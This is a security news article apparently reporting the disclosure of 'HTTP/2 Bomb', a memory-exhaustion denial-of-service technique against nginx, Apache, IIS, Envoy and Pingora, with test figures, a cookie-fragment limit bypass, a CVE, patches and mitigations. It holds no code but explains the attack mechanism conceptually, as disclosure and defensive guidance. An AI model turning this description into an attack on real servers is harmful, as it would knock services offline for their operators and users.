Researchers have disclosed a new denial-of-service (DoS) technique dubbed HTTP/2 Bomb, a memory-exhaustion attack that can render major web servers inaccessible within seconds.
The attack affects the default HTTP/2 configurations of nginx, Apache HTTP Server, Microsoft IIS, Envoy, and Cloudflare Pingora.
The attack was discovered by Codex and publicly disclosed on June 2, 2026. Researchers at security firm Calif demonstrated that a system connected via a 100 Mbps internet link could consume tens of gigabytes of server memory in under a minute. The discovery is credited to Quang Luong, with Jun Rong and Duc Phan validating the attack against additional server platforms.
The affected products power a significant portion of the web. nginx and Apache are among the most widely deployed web servers, IIS remains common in enterprise environments, while Envoy and Pingora are widely used in cloud and proxy infrastructure.
The attack combines two known HTTP/2 abuse techniques. The first targets HPACK, HTTP/2's header compression mechanism, which allows previously transmitted headers to be referenced using compact indexes. By inserting a header into HPACK's dynamic table and referencing it thousands of times, an attacker can force the server to allocate far more memory than the request size would suggest.
The second stage abuses HTTP/2 flow control. By advertising a zero-byte flow-control window, the attacker prevents the server from completing its response and freeing memory. Periodic one-byte WINDOW_UPDATE frames keep the connection alive while the allocations remain pinned in memory.
The researchers note that both components of the attack have been public for years. The novelty lies in combining HPACK-based memory amplification with HTTP/2 flow-control stalling, creating a practical attack that can consume and hold large amounts of memory with minimal bandwidth.
According to Codex, the attack achieved the following results during testing:
- Envoy 1.37.2 ~5,700:1 (amplification ratio) 32 GB in ~10 seconds (memory consumption rate)
- Apache httpd 2.4.67 ~4,000:1, 32 GB in ~18 seconds
- nginx 1.29.7 ~70:1, 32 GB in ~45 seconds
- Microsoft IIS (Windows Server 2025) ~68:1, 64 GB in ~45 seconds
Unlike earlier HPACK compression bombs, which relied on expanding large compressed values, the new technique exploits memory consumed by server-side header processing and bookkeeping. As a result, common limits on decoded header size do not stop the attack.
Researchers also identified a bypass involving fragmented Cookie headers. Apache and Envoy enforce limits on header counts, but split cookie “crumbs” were not counted toward those limits, enabling attackers to generate thousands of allocations while staying within configured restrictions.
A Shodan search conducted by the researchers found more than 880,000 internet-facing hosts supporting HTTP/2 and running one of the affected server products, although many are protected by CDNs.
nginx has already addressed the issue in version 1.29.8, which introduces a new max_headers directive. Apache fixed the flaw in mod_http2 v2.0.41 by ensuring cookie fragments count toward request field limits. The vulnerability was assigned CVE-2026-49975.
At the time of disclosure, no fixes were available for Microsoft IIS, Envoy, or Cloudflare Pingora, though their maintainers have been notified.
Organizations should upgrade affected software where patches are available. If that is not possible, researchers recommend disabling HTTP/2, enforcing hard limits on header counts, and applying memory limits to worker processes to prevent a single attack from exhausting system resources.
Leave a Reply